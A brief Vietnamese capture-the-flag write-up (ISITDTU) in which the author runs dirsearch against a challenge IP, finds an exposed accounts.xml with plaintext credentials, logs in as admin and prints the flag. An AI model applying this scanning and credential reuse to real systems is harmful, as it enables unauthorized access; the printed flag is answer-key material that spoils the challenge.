Tôi nghĩ đây là lỗi của người ra đề, t đã không làm theo cách nghĩ của tác giả
Ban đầu tôi cũng thử payload sqli, xpath, ... nhưng khi tôi thử dùng dirsearch:
```
python3 dirsearch.py -u http://35.190.131.105 -e php
[00:43:44] 200 - 381B - /accounts.xml
[00:44:46] 200 - 2KB - /index.php
[00:44:47] 200 - 2KB - /index.php/login/
[00:44:55] 200 - 2KB - /login.php
```

Kết quả là tôi tìm được đường dẫn file /accounts.xml
```
<users>
<user>
<uS3rNaM3>ColdTick</uS3rNaM3>
<PaSSW0rd>FromD2VNWithLove</PaSSW0rd>
<type>guest</type>
</user>
<user>
<uS3rNaM3>guest</uS3rNaM3>
<PaSSW0rd>guest</PaSSW0rd>
<type>guest</type>
</user>
<user>
<uS3rNaM3>Adm1n</uS3rNaM3>
<PaSSW0rd>Ez_t0_gu3ss_PaSSw0rd</PaSSW0rd>
<type>Administrator</type>
</user>
</users>
```
Tôi đăng nhập tài khoản `Adm1n:Ez_t0_gu3ss_PaSSw0rd` và tìm được flag: `ISITDTU{b0f23ae6a1e2ae2ab7c23c5814256761}`